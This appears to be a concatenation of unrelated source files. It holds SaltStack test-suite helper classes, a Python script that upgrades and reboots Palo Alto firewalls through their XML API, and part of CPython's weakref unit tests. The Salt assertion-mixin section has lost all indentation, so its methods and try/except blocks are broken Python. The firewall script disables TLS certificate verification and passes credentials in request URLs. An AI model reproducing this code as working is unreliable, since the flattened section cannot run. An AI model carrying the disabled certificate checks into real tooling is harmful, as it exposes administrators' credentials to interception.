    def run_state(self, function, **kwargs):
        '''
        Run the state.single command and return the state return structure
        '''
        ret = self.run_function('state.single', [function], **kwargs)
        return self._check_state_return(ret)

    @property
    def minion_opts(self):
        '''
        Return the options used for the minion
        '''
        return self.get_config('minion')

    @property
    def sub_minion_opts(self):
        '''
        Return the options used for the sub_minion
        '''
        return self.get_config('sub_minion')

    def _check_state_return(self, ret):
        '''
        Detect "state function is already running" error lists, kill the
        offending jobs, and annotate the return; dict returns pass through.
        '''
        if isinstance(ret, dict):
            # This is the supposed return format for state calls
            return ret
        if isinstance(ret, list):
            jids = []
            # These are usually errors
            for item in ret[:]:
                if not isinstance(item, six.string_types):
                    # We don't know how to handle this
                    continue
                match = STATE_FUNCTION_RUNNING_RE.match(item)
                if not match:
                    # We don't know how to handle this
                    continue
                jid = match.group('jid')
                if jid in jids:
                    # Already handled this job id.
                    continue
                jids.append(jid)
                job_data = self.run_function(
                    'saltutil.find_job', [jid]
                )
                job_kill = self.run_function('saltutil.kill_job', [jid])
                msg = (
                    'A running state.single was found causing a state lock. '
                    'Job details: \'{0}\' Killing Job Returned: \'{1}\''.format(
                        job_data, job_kill
                    )
                )
                ret.append('[TEST SUITE ENFORCED]{0}'
                           '[/TEST SUITE ENFORCED]'.format(msg))
        return ret
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a syndic based execution test
    '''

    _salt_client_config_file_name_ = 'syndic_master'

    def run_function(self, function, arg=()):
        '''
        Call *function* on the 'minion' target through the syndic master
        and return only that minion's payload, skipping the test when no
        reply arrives.
        '''
        reply = self.client.cmd('minion', function, arg, timeout=25)
        if 'minion' not in reply:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion. Command output: {0}'.format(reply)
            )
        return reply['minion']
class ShellCase(AdaptedConfigurationTestCaseMixIn, ShellTestCase, ScriptPathMixin):
    '''
    Execute a test for a shell command
    '''

    _code_dir_ = CODE_DIR
    _script_dir_ = SCRIPT_DIR
    _python_executable_ = PYEXEC

    def chdir(self, dirname):
        '''Change directory, falling back to the integration test dir.'''
        try:
            os.chdir(dirname)
        except OSError:
            os.chdir(INTEGRATION_TEST_DIR)

    def run_salt(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt
        '''
        arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
        return self.run_script('salt', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)

    def run_ssh(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-ssh
        '''
        # -W forces the raw shell; key and roster come from the temp conf dir.
        arg_str = '-W -c {0} -i --priv {1} --roster-file {2} --out=json localhost {3}'.format(self.get_config_dir(), os.path.join(TMP_CONF_DIR, 'key_test'), os.path.join(TMP_CONF_DIR, 'roster'), arg_str)
        return self.run_script('salt-ssh', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr, raw=True)

    # NOTE(review): 'async' became a reserved keyword in Python 3.7, so this
    # signature only parses on Python 2 / <= 3.6. Renaming it would break
    # existing keyword callers; flagged rather than changed.
    def run_run(self, arg_str, with_retcode=False, catch_stderr=False, async=False, timeout=60, config_dir=None):
        '''
        Execute salt-run
        '''
        arg_str = '-c {0}{async_flag} -t {timeout} {1}'.format(config_dir or self.get_config_dir(),
                                                               arg_str,
                                                               timeout=timeout,
                                                               async_flag=' --async' if async else '')
        return self.run_script('salt-run', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)

    def run_run_plus(self, fun, options='', *arg, **kwargs):
        '''
        Execute Salt run and the salt run function and return the data from
        each in a dict
        '''
        ret = {}
        # First, through the salt-run CLI script...
        ret['out'] = self.run_run(
            '{0} {1} {2}'.format(options, fun, ' '.join(arg)), catch_stderr=kwargs.get('catch_stderr', None)
        )
        # ...then directly through the Runner API, with stdio suppressed.
        opts = {}
        opts.update(self.get_config('master'))
        opts.update({'doc': False, 'fun': fun, 'arg': arg})
        with RedirectStdStreams():
            runner = salt.runner.Runner(opts)
            ret['fun'] = runner.run()
        return ret

    def run_key(self, arg_str, catch_stderr=False, with_retcode=False):
        '''
        Execute salt-key
        '''
        arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
        return self.run_script(
            'salt-key',
            arg_str,
            catch_stderr=catch_stderr,
            with_retcode=with_retcode
        )

    def run_cp(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-cp
        '''
        arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
        return self.run_script('salt-cp', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)

    def run_call(self, arg_str, with_retcode=False, catch_stderr=False):
        '''
        Execute salt-call.
        '''
        arg_str = '--config-dir {0} {1}'.format(self.get_config_dir(), arg_str)
        return self.run_script('salt-call', arg_str, with_retcode=with_retcode, catch_stderr=catch_stderr)

    def run_cloud(self, arg_str, catch_stderr=False, timeout=None):
        '''
        Execute salt-cloud
        '''
        arg_str = '-c {0} {1}'.format(self.get_config_dir(), arg_str)
        return self.run_script('salt-cloud', arg_str, catch_stderr, timeout)
class ShellCaseCommonTestsMixIn(CheckShellBinaryNameAndVersionMixIn):
    '''
    Common CLI checks shared by the shell-command test cases.
    '''

    _call_binary_expected_version_ = salt.version.__version__

    def test_salt_with_git_version(self):
        '''
        Verify the CLI reports the git-derived version when running from a
        git checkout; skip in every situation where that cannot work.
        '''
        if getattr(self, '_call_binary_', None) is None:
            self.skipTest('\'_call_binary_\' not defined.')
        from salt.utils import which
        from salt.version import __version_info__, SaltStackVersion
        git = which('git')
        if not git:
            self.skipTest('The git binary is not available')
        # Let's get the output of git describe
        process = subprocess.Popen(
            [git, 'describe', '--tags', '--first-parent', '--match', 'v[0-9]*'],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=CODE_DIR
        )
        out, err = process.communicate()
        if process.returncode != 0:
            # Old git versions lack --first-parent; retry without it.
            process = subprocess.Popen(
                [git, 'describe', '--tags', '--match', 'v[0-9]*'],
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                close_fds=True,
                cwd=CODE_DIR
            )
            out, err = process.communicate()
        if not out:
            self.skipTest(
                'Failed to get the output of \'git describe\'. '
                'Error: \'{0}\''.format(
                    salt.utils.to_str(err)
                )
            )
        parsed_version = SaltStackVersion.parse(out)
        if parsed_version.info < __version_info__:
            self.skipTest(
                'We\'re likely about to release a new version. This test '
                'would fail. Parsed(\'{0}\') < Expected(\'{1}\')'.format(
                    parsed_version.info, __version_info__
                )
            )
        elif parsed_version.info != __version_info__:
            self.skipTest(
                'In order to get the proper salt version with the '
                'git hash you need to update salt\'s local git '
                'tags. Something like: \'git fetch --tags\' or '
                '\'git fetch --tags upstream\' if you followed '
                'salt\'s contribute documentation. The version '
                'string WILL NOT include the git hash.'
            )
        out = '\n'.join(self.run_script(self._call_binary_, '--version'))
        self.assertIn(parsed_version.string, out)
@requires_sshd_server
class SSHCase(ShellCase):
    '''
    Execute a command via salt-ssh
    '''

    def _arg_str(self, function, arg):
        '''Join a function name and its arguments into a CLI string.'''
        return '{0} {1}'.format(function, ' '.join(arg))

    def run_function(self, function, arg=(), timeout=25, **kwargs):
        '''
        Run *function* over salt-ssh against localhost and return the
        decoded 'localhost' payload; on any decode failure, the raw output.
        '''
        cmd_output = self.run_ssh(self._arg_str(function, arg))
        try:
            return json.loads(cmd_output)['localhost']
        except Exception:
            return cmd_output
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{} is equal to {}. Salt returned an empty dictionary.'
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, six.string_types):
# If it's a string, make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in six.itervalues(ret):
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[\'{0}\']'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned:\n{0}'.format(
pprint.pformat(ret)
)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
log.info('Salt Full Return:\n{0}'.format(pprint.pformat(ret)))
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(next(six.itervalues(ret)))
)
)
except (AttributeError, IndexError):
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltStateWarning(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
    """Assert that *not_in_comment* does NOT occur in 'warnings'."""
    warnings = self.__getWithinSaltReturn(ret, 'warnings')
    return self.assertNotIn(not_in_comment, warnings)
def assertInSaltReturn(self, item_to_check, ret, keys):
    """Assert that *item_to_check* is in the value found under *keys*."""
    value = self.__getWithinSaltReturn(ret, keys)
    return self.assertIn(item_to_check, value)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
    """Assert that *item_to_check* is NOT in the value found under *keys*."""
    value = self.__getWithinSaltReturn(ret, keys)
    return self.assertNotIn(item_to_check, value)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
    """Assert that *pattern* matches the value found under *keys*."""
    value = self.__getWithinSaltReturn(ret, keys)
    return self.assertRegexpMatches(value, pattern)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
    """Assert that the 'changes' sub-value (under *keys*) equals *comparison*."""
    # Always anchor the lookup at the state's 'changes' dictionary.
    keys = ['changes'] + self.__return_valid_keys(keys)
    found = self.__getWithinSaltReturn(ret, keys)
    return self.assertEqual(found, comparison)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
    """Assert that the 'changes' sub-value (under *keys*) differs from *comparison*."""
    # Always anchor the lookup at the state's 'changes' dictionary.
    keys = ['changes'] + self.__return_valid_keys(keys)
    found = self.__getWithinSaltReturn(ret, keys)
    return self.assertNotEqual(found, comparison)
|
pa_upgrade.py | import sys
import xml.etree.ElementTree as ET
import requests
import csv
import time
import ping3
import getpass
import threading
#Ignores SSL warnings
requests.packages.urllib3.disable_warnings()
#Function to authenticate fw with user/pw provided and obtain the API key
def authenticate(fwip, user, pw):
    """Obtain an API key from the firewall's keygen endpoint.

    Returns the key string. On any failure, writes a row to the shared
    result CSV (module-level ``resultWriter``) and exits.
    """
    try:
        # Use 'params' so the credentials are URL-encoded: passwords
        # containing '&', '#', '%' etc. previously corrupted the raw
        # f-string URL.
        # NOTE(review): credentials still travel in the query string and
        # may appear in proxy logs; PAN-OS also accepts POST body data.
        r = requests.post(
            f"https://{fwip}/api/",
            params={"type": "keygen", "user": user, "password": pw},
            verify=False,
        )
        if r.status_code == 200:
            root = ET.fromstring(r.text)
            # Response shape: <response><result><key>...</key></result></response>
            api_key = root.find(".result/key").text
        else:
            resultWriter.writerow([fwip, "Failed", "Authentication failed"])
            sys.exit()
    except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
        # requests' ConnectionError/Timeout do NOT inherit from the
        # builtins of the same name, so RequestException must be caught
        # explicitly or network failures would propagate uncaught.
        resultWriter.writerow([fwip, "Failed", e])
        sys.exit()
    return api_key
#Does a Check now for software on Firewall
def softwarecheck(fwip, api_key):
    """Refresh the firewall's software catalog and confirm the requested
    version is available.

    Reads the module-level ``vers`` (version string entered by the user).
    Writes a failure row and exits when the version is absent or the API
    call fails.
    """
    try:
        r = requests.post(
            f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><check></check></software></system></request>",
            verify=False,
        )
        if r.status_code == 200:
            root = ET.fromstring(r.text)
            # Collect every version visible after the catalog refresh.
            available = [
                entry.find("version").text
                for entry in root.findall(".result/sw-updates/versions/entry")
            ]
            # Require an exact match. The previous substring test
            # (any(i in str(vers) for i in vsn)) could accept e.g. "10.1"
            # from the catalog when "10.1.6" was requested but missing.
            if vers not in available:
                resultWriter.writerow([fwip, "Failed", f"Could not find version specified. \nCheck connectivity to update servers and that the firewall supports version: {vers}"])
                sys.exit()
        else:
            resultWriter.writerow([fwip, "Failed", "API call failed, ensure that the firewall ip and api key are correct."])
            sys.exit()
    except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
        # requests errors do not derive from the builtin ConnectionError.
        resultWriter.writerow([fwip, "Failed", e])
        sys.exit()
#Initiate the download of the software
def download_software(fwip, api_key, vers, max_attempts=30):
    """Download PAN-OS *vers* onto the firewall and wait for the job to end.

    Retries a rejected/failed download request once a minute, giving up
    after *max_attempts* tries (resolves the TODO: the old code recursed
    forever with no timeout). Polls the download job every minute until it
    leaves the PEND state.
    """
    for _ in range(max_attempts):
        try:
            r = requests.post(
                f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><download><version>{vers}</version></download></software></system></request>",
                verify=False,
            )
            if r.status_code != 200:
                # Transport-level failure; wait a minute and retry.
                time.sleep(60)
                continue
            root = ET.fromstring(r.text)
            if root.attrib.get("status") != "success":
                # Firewall rejected the download request; wait and retry.
                time.sleep(60)
                continue
            # Extract the job id so completion can be polled.
            jobid = None
            for job in root.findall("./result"):
                jobid = job.find("job").text
            jobstat = "PEND"
            # Poll the job once a minute until it is no longer pending.
            while jobstat == "PEND":
                try:
                    r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><jobs><id>{jobid}</id></jobs></show>", verify=False)
                    if r.status_code == 200:
                        root = ET.fromstring(r.text)
                        for stat in root.findall(".result/job"):
                            jobstat = stat.find("result").text
                        time.sleep(60)
                except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
                    resultWriter.writerow([fwip, "Failed", e])
                    sys.exit()
            # NOTE(review): like the original, the final job result value
            # is not inspected here; install_software is the next gate.
            return
        except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
            resultWriter.writerow([fwip, "Failed", e])
            sys.exit()
    resultWriter.writerow([fwip, "Failed", f"Download of {vers} did not succeed after {max_attempts} attempts"])
    sys.exit()
#Function to initiate install of software
def install_software(fwip, api_key, vers, max_attempts=30):
    """Install the previously-downloaded PAN-OS *vers* and wait for the job.

    Retries a rejected/failed install request once a minute, giving up
    after *max_attempts* tries (resolves the TODO: the old code recursed
    forever with no timeout). Polls the install job every minute until it
    leaves the PEND state.
    """
    for _ in range(max_attempts):
        try:
            r = requests.post(
                f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><system><software><install><version>{vers}</version></install></software></system></request>",
                verify=False,
            )
            if r.status_code != 200:
                # Transport-level failure; wait a minute and retry.
                time.sleep(60)
                continue
            root = ET.fromstring(r.text)
            if root.attrib.get("status") != "success":
                # Firewall rejected the install request; wait and retry.
                time.sleep(60)
                continue
            # Extract the job id so completion can be polled.
            jobid = None
            for job in root.findall("./result"):
                jobid = job.find("job").text
            jobstat = "PEND"
            # Poll the job once a minute until it is no longer pending.
            while jobstat == "PEND":
                try:
                    r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><jobs><id>{jobid}</id></jobs></show>", verify=False)
                    if r.status_code == 200:
                        root = ET.fromstring(r.text)
                        for stat in root.findall(".result/job"):
                            jobstat = stat.find("result").text
                        time.sleep(60)
                except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
                    resultWriter.writerow([fwip, "Failed", e])
                    sys.exit()
            return
        except (requests.exceptions.RequestException, ConnectionError, TimeoutError) as e:
            resultWriter.writerow([fwip, "Failed", e])
            sys.exit()
    resultWriter.writerow([fwip, "Failed", f"Install of {vers} did not succeed after {max_attempts} attempts"])
    sys.exit()
#Initiates the reboot
def rbfw(fwip, api_key):
    """Ask the firewall to restart.

    The reboot drops the HTTP session mid-reply, so a short timeout is set
    and any request-level error is deliberately ignored.
    """
    try:
        requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<request><restart><system></system></restart></request>", verify=False, timeout=5)
    except Exception:
        # Expected: the restart kills the connection. Catching Exception
        # (instead of the old bare 'except:') keeps KeyboardInterrupt and
        # SystemExit working.
        pass
#Pings the firewall to check if it is back online
def checkfw(fwip):
    """Wait for the rebooting firewall to answer pings again.

    Sleeps 10 minutes up front, then pings once a minute for up to 30
    further attempts (~40 minutes total) before recording a failure.
    """
    timeout = 0
    time.sleep(600)
    check = ping3.ping(fwip)
    # ping3.ping() returns None when the host does not respond; use an
    # identity check ('is None') rather than '== None'.
    while check is None:
        time.sleep(60)
        check = ping3.ping(fwip)
        timeout += 1
        if timeout == 30:
            resultWriter.writerow([fwip, "Failed", "No response from firewall after 40 minutes"])
            break
#Checks the version after reboot to ensure it booted to the correct version
def verify(fwip, api_key, max_attempts=30):
    """Confirm the firewall rebooted into the requested version.

    Compares the running sw-version against the module-level ``vers`` and
    records Success/Failed in the result CSV. Retries every two minutes
    while the management plane is still starting, giving up after
    *max_attempts* tries (resolves the TODO: the old code recursed forever,
    and silently returned nothing on a non-200 response).
    """
    for _ in range(max_attempts):
        try:
            r = requests.post(f"https://{fwip}/api/?key={api_key}&type=op&cmd=<show><system><info></info></system></show>", verify=False)
            if r.status_code == 200:
                root = ET.fromstring(r.text)
                panos_ver = root.find(".result/system/sw-version").text
                if panos_ver == vers:
                    resultWriter.writerow([fwip, "Success", None])
                else:
                    resultWriter.writerow([fwip, "Failed", "Verification failed, firewall did not upgrade to version requested."])
                return
        except Exception:
            # Management plane not ready yet (connection refused, bad XML);
            # fall through to the retry sleep.
            pass
        time.sleep(120)
    resultWriter.writerow([fwip, "Failed", "Verification failed, firewall API never became reachable."])
#Calls all the functions in specific order
def process(fwip):
    """Run the complete upgrade pipeline for a single firewall."""
    # Authenticate first; every later step needs the API key.
    key = authenticate(fwip, user, pw)
    # Validate the catalog, then fetch and install the requested image.
    softwarecheck(fwip, key)
    download_software(fwip, key, vers)
    install_software(fwip, key, vers)
    # Reboot into the new image, wait for it, and confirm the version.
    rbfw(fwip, key)
    checkfw(fwip)
    verify(fwip, key)
if __name__ == "__main__":
    #Warning message
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    print("***********************WARNING: THIS SCRIPT WILL REBOOT THE SELECTED FIREWALLS*****************************")
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    print("***********************************************************************************************************")
    #Variables and user inputs (module-level on purpose: worker threads
    #read user/pw/vers/resultWriter as globals)
    fw = input("\nEnter the IP/FQDNs of the firewalls in fw.txt: ")
    vers = input("\nEnter the PanOS version you wish to upgrade to: ")
    user = input("\nEnter your username: ")
    pw = getpass.getpass("\nEnter your password: ")
    proclist = []
    #Build the firewall list: blank input reads fw.txt, otherwise the typed
    #value is a comma-separated list. (Previously a non-blank entry was
    #iterated character by character, producing one "firewall" per letter.)
    if fw == "":
        with open("fw.txt", "r") as fwtxt:
            fwlist = [line.strip() for line in fwtxt if line.strip()]
    else:
        fwlist = [item.strip() for item in fw.split(",") if item.strip()]
    #Creating new csv to add logs
    result_log = "PA-Upgrade-Results.csv"
    resultcsv = open(result_log, "w", newline="")
    resultWriter = csv.writer(resultcsv, delimiter=",")
    # NOTE(review): worker threads share this writer; the csv module does
    # not document writers as thread-safe — add a lock if rows interleave.
    resultWriter.writerow(["Firewall", "Status", "Error"])
    #Starts multithreading: one worker per firewall
    for fwip in fwlist:
        proc = threading.Thread(target=process, args=[fwip])
        proc.start()
        proclist.append(proc)
    #Wait for every thread to finish
    for proc in proclist:
        proc.join()
    #Prompt to end
    input(f"\n\n\nScript complete, results can be found in {result_log} \nPlease press enter to close.")
    #Ends script
    resultcsv.close()
    sys.exit()
|
test_weakref.py | import gc
import sys
import unittest
import UserList
import weakref
import operator
import contextlib
import copy
import time
from test import test_support
# Used in ReferencesTestCase.test_ref_created_during_del() .
# Module-level slot so a __del__ hook can stash a weakref globally.
ref_from_del = None
class C:
    """Minimal class used throughout as a generic weakref target."""
    def method(self):
        # Exists only so bound/unbound method objects can be created.
        pass
class Callable:
    """Callable object that records the argument of its last invocation."""
    # Last value passed to __call__ (None until first call).
    bar = None
    def __call__(self, x):
        self.bar = x
def create_function():
    """Return a brand-new function object, usable as a weakref target."""
    def inner():
        pass
    return inner
def create_bound_method():
    """Return a method bound to a fresh C instance."""
    instance = C()
    return instance.method
def create_unbound_method():
    """Return C's method without binding it to an instance."""
    return getattr(C, "method")
class Object:
    """Hashable wrapper around a value; equality delegates to the value.

    Comparisons against non-Object operands return NotImplemented so
    Python's reflected-comparison machinery still applies.
    """
    def __init__(self, arg):
        self.arg = arg

    def __repr__(self):
        return "<Object %r>" % self.arg

    def __eq__(self, other):
        if not isinstance(other, Object):
            return NotImplemented
        return self.arg == other.arg

    def __ne__(self, other):
        if not isinstance(other, Object):
            return NotImplemented
        return self.arg != other.arg

    def __hash__(self):
        # Hash like the wrapped value so equal Objects hash equal.
        return hash(self.arg)
class RefCycle:
    """Object whose only purpose is to sit in a trivial reference cycle."""
    def __init__(self):
        # self.cycle -> self keeps the instance alive until cyclic GC runs.
        self.cycle = self
@contextlib.contextmanager
def collect_in_thread(period=0.001):
    """
    Ensure GC collections happen in a different thread, at a high frequency.
    """
    # Imported lazily so the test is skipped on platforms without threading.
    threading = test_support.import_module('threading')
    please_stop = False
    def collect():
        # Background loop: force a collection every *period* seconds until
        # the context manager exits and flips please_stop.
        while not please_stop:
            time.sleep(period)
            gc.collect()
    with test_support.disable_gc():
        # Shrink the bytecode check interval so thread switches (and hence
        # background collections) interleave aggressively with the caller.
        old_interval = sys.getcheckinterval()
        sys.setcheckinterval(20)
        t = threading.Thread(target=collect)
        t.start()
        try:
            yield
        finally:
            please_stop = True
            t.join()
            sys.setcheckinterval(old_interval)
class TestBase(unittest.TestCase):
    """Shared fixture: counts weakref-callback invocations in self.cbcalled."""
    def setUp(self):
        self.cbcalled = 0
    def callback(self, ref):
        # Generic weakref callback; just bumps the invocation counter.
        self.cbcalled += 1
class ReferencesTestCase(TestBase):
    """Core weakref.ref / weakref.proxy behavior and GC-interaction
    regression tests (many guard against historical CPython crashes; the
    exact statement order in the cycle tests IS the test)."""
    def test_basic_ref(self):
        self.check_basic_ref(C)
        self.check_basic_ref(create_function)
        self.check_basic_ref(create_bound_method)
        self.check_basic_ref(create_unbound_method)
        # Just make sure the tp_repr handler doesn't raise an exception.
        # Live reference:
        o = C()
        wr = weakref.ref(o)
        repr(wr)
        # Dead reference:
        del o
        repr(wr)
    def test_basic_callback(self):
        self.check_basic_callback(C)
        self.check_basic_callback(create_function)
        self.check_basic_callback(create_bound_method)
        self.check_basic_callback(create_unbound_method)
    def test_multiple_callbacks(self):
        # Two refs with callbacks on one object: both must fire exactly once.
        o = C()
        ref1 = weakref.ref(o, self.callback)
        ref2 = weakref.ref(o, self.callback)
        del o
        self.assertIsNone(ref1(), "expected reference to be invalidated")
        self.assertIsNone(ref2(), "expected reference to be invalidated")
        self.assertEqual(self.cbcalled, 2,
                         "callback not called the right number of times")
    def test_multiple_selfref_callbacks(self):
        # Make sure all references are invalidated before callbacks are called
        #
        # What's important here is that we're using the first
        # reference in the callback invoked on the second reference
        # (the most recently created ref is cleaned up first).  This
        # tests that all references to the object are invalidated
        # before any of the callbacks are invoked, so that we only
        # have one invocation of _weakref.c:cleanup_helper() active
        # for a particular object at a time.
        #
        def callback(object, self=self):
            self.ref()
        c = C()
        self.ref = weakref.ref(c, callback)
        ref1 = weakref.ref(c, callback)
        del c
    def test_constructor_kwargs(self):
        # weakref.ref() must reject keyword arguments.
        c = C()
        self.assertRaises(TypeError, weakref.ref, c, callback=None)
    def test_proxy_ref(self):
        o = C()
        o.bar = 1
        ref1 = weakref.proxy(o, self.callback)
        ref2 = weakref.proxy(o, self.callback)
        del o
        def check(proxy):
            proxy.bar
        self.assertRaises(weakref.ReferenceError, check, ref1)
        self.assertRaises(weakref.ReferenceError, check, ref2)
        self.assertRaises(weakref.ReferenceError, bool, weakref.proxy(C()))
        self.assertEqual(self.cbcalled, 2)
    def check_basic_ref(self, factory):
        # Helper: a ref to a live object must dereference to that object.
        o = factory()
        ref = weakref.ref(o)
        self.assertIsNotNone(ref(),
                             "weak reference to live object should be live")
        o2 = ref()
        self.assertIs(o, o2,
                      "<ref>() should return original object if live")
    def check_basic_callback(self, factory):
        # Helper: deleting the referent must fire the callback exactly once.
        self.cbcalled = 0
        o = factory()
        ref = weakref.ref(o, self.callback)
        del o
        self.assertEqual(self.cbcalled, 1,
                         "callback did not properly set 'cbcalled'")
        self.assertIsNone(ref(),
                          "ref2 should be dead after deleting object reference")
    def test_ref_reuse(self):
        o = C()
        ref1 = weakref.ref(o)
        # create a proxy to make sure that there's an intervening creation
        # between these two; it should make no difference
        proxy = weakref.proxy(o)
        ref2 = weakref.ref(o)
        self.assertIs(ref1, ref2,
                      "reference object w/out callback should be re-used")
        o = C()
        proxy = weakref.proxy(o)
        ref1 = weakref.ref(o)
        ref2 = weakref.ref(o)
        self.assertIs(ref1, ref2,
                      "reference object w/out callback should be re-used")
        self.assertEqual(weakref.getweakrefcount(o), 2,
                         "wrong weak ref count for object")
        del proxy
        self.assertEqual(weakref.getweakrefcount(o), 1,
                         "wrong weak ref count for object after deleting proxy")
    def test_proxy_reuse(self):
        o = C()
        proxy1 = weakref.proxy(o)
        ref = weakref.ref(o)
        proxy2 = weakref.proxy(o)
        self.assertIs(proxy1, proxy2,
                      "proxy object w/out callback should have been re-used")
    def test_basic_proxy(self):
        # A proxy must transparently forward the container protocol.
        o = C()
        self.check_proxy(o, weakref.proxy(o))
        L = UserList.UserList()
        p = weakref.proxy(L)
        self.assertFalse(p, "proxy for empty UserList should be false")
        p.append(12)
        self.assertEqual(len(L), 1)
        self.assertTrue(p, "proxy for non-empty UserList should be true")
        with test_support.check_py3k_warnings():
            p[:] = [2, 3]
        self.assertEqual(len(L), 2)
        self.assertEqual(len(p), 2)
        self.assertIn(3, p, "proxy didn't support __contains__() properly")
        p[1] = 5
        self.assertEqual(L[1], 5)
        self.assertEqual(p[1], 5)
        L2 = UserList.UserList(L)
        p2 = weakref.proxy(L2)
        self.assertEqual(p, p2)
        ## self.assertEqual(repr(L2), repr(p2))
        L3 = UserList.UserList(range(10))
        p3 = weakref.proxy(L3)
        with test_support.check_py3k_warnings():
            self.assertEqual(L3[:], p3[:])
            self.assertEqual(L3[5:], p3[5:])
            self.assertEqual(L3[:5], p3[:5])
            self.assertEqual(L3[2:5], p3[2:5])
    def test_proxy_unicode(self):
        # See bug 5037
        class C(object):
            def __str__(self):
                return "string"
            def __unicode__(self):
                return u"unicode"
        instance = C()
        self.assertIn("__unicode__", dir(weakref.proxy(instance)))
        self.assertEqual(unicode(weakref.proxy(instance)), u"unicode")
    def test_proxy_index(self):
        # __index__ must be forwarded through the proxy.
        class C:
            def __index__(self):
                return 10
        o = C()
        p = weakref.proxy(o)
        self.assertEqual(operator.index(p), 10)
    def test_proxy_div(self):
        # Floor-division slots (including in-place) forwarded by the proxy.
        class C:
            def __floordiv__(self, other):
                return 42
            def __ifloordiv__(self, other):
                return 21
        o = C()
        p = weakref.proxy(o)
        self.assertEqual(p // 5, 42)
        p //= 5
        self.assertEqual(p, 21)
    # The PyWeakref_* C API is documented as allowing either NULL or
    # None as the value for the callback, where either means "no
    # callback".  The "no callback" ref and proxy objects are supposed
    # to be shared so long as they exist by all callers so long as
    # they are active.  In Python 2.3.3 and earlier, this guarantee
    # was not honored, and was broken in different ways for
    # PyWeakref_NewRef() and PyWeakref_NewProxy().  (Two tests.)
    def test_shared_ref_without_callback(self):
        self.check_shared_without_callback(weakref.ref)
    def test_shared_proxy_without_callback(self):
        self.check_shared_without_callback(weakref.proxy)
    def check_shared_without_callback(self, makeref):
        o = Object(1)
        p1 = makeref(o, None)
        p2 = makeref(o, None)
